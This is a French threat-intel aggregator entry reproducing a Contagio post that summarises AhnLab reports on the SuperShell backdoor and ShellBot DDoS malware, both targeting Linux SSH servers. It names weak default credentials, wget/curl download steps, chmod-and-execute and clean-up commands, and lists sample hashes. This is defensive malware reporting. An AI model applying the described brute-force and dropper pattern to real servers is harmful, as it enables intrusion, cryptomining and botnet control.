One Article Review
| Source |  Contagio |
|---|---|
| Identifiant | 8575637 |
| Date de publication | 2024-09-12 21:22:50 (vue: 2024-09-13 02:17:51) |
| Titre | 2024-09-12 SuperShell + 2023-03-13 Shellbot ciblant les échantillons de serveurs Linux SSH 2024-09-12 SUPERSHELL + 2023-03-13 SHELLBOT Targeting Linux SSH servers Samples |
| Texte |  2024-09-12 Ahnlab: SuperShell malware targeting Linux SSH serversSuperShell is a sophisticated backdoor malware targeting Linux SSH servers, written in the Go language, which allows cross-platform functionality on Linux, Windows, and Android. Created by a Chinese-speaking developer, it operates as a reverse shell, enabling attackers to execute commands remotely on the compromised systems. The attack begins with brute force and dictionary attacks against SSH servers, using weak credentials like "root/password" and "root/123456qwerty." Once access is gained, attackers execute a series of commands to download and install SuperShell, leveraging tools like wget, curl, tftp, and FTP, with download sources often hosted on compromised servers.SuperShell\'s obfuscation adds complexity, but it can still be identified through specific internal strings and its runtime behavior. The malware\'s installation process is versatile, targeting directories like /tmp, /var/run, /mnt, and /root, with commands often including clean-up actions to remove traces post-installation (rm -r *). Typically, the payload involves downloading a script or binary, which is then executed with elevated permissions using chmod +x followed by execution (./ssh1). This pattern is consistently observed across multiple commands, highlighting the malware\'s redundancy and persistence in ensuring successful deployment.Additionally, the attackers often deploy XMRig, a Monero cryptocurrency miner, alongside SuperShell, hinting at a dual-purpose attack: maintaining persistent control over the system while generating illicit cryptocurrency. 2023-03-13 Ahnlab: ShellBot Malware Being Distributed to Linux SSH ServersOn March 13, 2023, ASEC reported that ShellBot, a Perl-based DDoS bot, is actively targeting Linux SSH servers. The malware exploits weak SSH credentials through brute-force attacks, gaining access to deploy its payload. Once installed, ShellBot connects to a Command and Control (C&C) server via the IRC protocol, enabling attackers to issue commands, steal data, and launch DDoS attacks.Initial Access: Attackers scan for servers with open SSH ports (port 22) and use brute-force tools to guess weak or default credentials.Installation: After gaining access, ShellBot is deployed, often achieving persistence by modifying startup scripts or cron jobs.IRC Protocol: ShellBot uses the IRC protocol for C&C communication, allowing it to receive commands like executing remote tasks or launching DDoS attacks without needing a custom C&C infrastructure.Customization: ShellBot is highly customizable, with variants like "LiGhT\'s Modded perlbot v2" offering different capabilities and attack methods tailored by vari |
| Notes | ★★ |
| Envoyé | Oui |
| Condensat | 2023 2024 └── ├── /mnt /root /ssh1 /tmp /var/run 0857f90be97326ff45f17ec3f6ce60d9a0f6d8faed34e48527fde5ec30bd5a0d│ 0c1673e442b945a0aecf60d3970e924b16bd72d46e257bd72927821e4ebbc9ca│ 157bea84012ca8b8dc6c0eabf80db1f0256eafccf4047d3e4e90c50ed42e69ff 1f3c279ea684d5cbdc7004819bf15a160f70b2c79c4affd309f9ab3ad957045b│ 2023 2024 2220783661db230d0808a5750060950688e2618d462ccbe07f54408154c227c1 23dbfb99fc6c4fcfc279100c4b6481a7fd3f0b061b8d915604efa2ba37c8ddfa 5ba1d0efb313ccc20e3d5f2476a3db811e15c80c3f1ac73b7a02d80c5c49c728│ a26de5b607e3a66af8b7db2c13bcd1c658817649c699f8731db6f237c3c5b1ce│ access access: achieving across actions actively actors additionally adds after against ahnlab: allowing allows alongside android around asec attack attack: attackers attacks b7d62d1a145ddda241e624ef94ab31fcca1a13f79e130d0a704586e35745282a backdoor based been begins behavior being binary blog blogspot bot broken brute but c&c c3pool can capabilities cb80570332e3e32037f426e835d05bdcd276e9e5acfd439027d788dd64dcb47d└── cf5a7b7c71564a5eef77cc5297b9ffd6cd021eb44c0901ea3957cb2397b43e15 chinese chmod clean com command commands communication complexity compromised connects consistently contagiodump contagiominidump control created credentials cron cross cryptocurrency curl custom customizable customization: data ddos default deploy deployed deployment developer dictionary different directories distributed download download download downloading dropped dual due e476b9c07fcd80824d4eafce0e826ae1c12706ca6215eb6e3995468374bb8a76 elevated email enabling ensuring especially execute executed executing execution exploits f5a26a68344c1ffd136ba73dec9d08f61212872cdba33bd4d7d32733a72e4ed5 file find followed force from ftp functionality gained gaining generating guess has have highlighting highly hinting hosted hosting identified illicit including information├── infrastructure initial install installation installation: installed internal involves irc issue its jobs just language launch launching led leveraging light like link links linksover linux maintaining malware many march methods miner modded modifying monero multiple name need needing note obfuscation observed offering often older once open operates other over password past pattern payload perl perlbot permissions persistence persistent pl │ platform pl│ policies port ports post posts process protocol protocol: providers purpose receive redundancy remote remotely remove repo reported reverse root/123456qwerty root/password runtime samples samples│ scan scheme script scripts search series server servers serverson serverssupershell setup sh shell shellbot shellbot│ sophisticated sources speaking specific ssh ssh1 ssh1 malware startup steal storage stricter strings successful supershell supershell support system systems tailored targeting tasks tftp the contagio then threat through tools traces typically url use uses using variants various versatile weak wget which windows without written xmrig years └── ├── |
| Tags | Malware Tool Threat Mobile |
| Stories | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.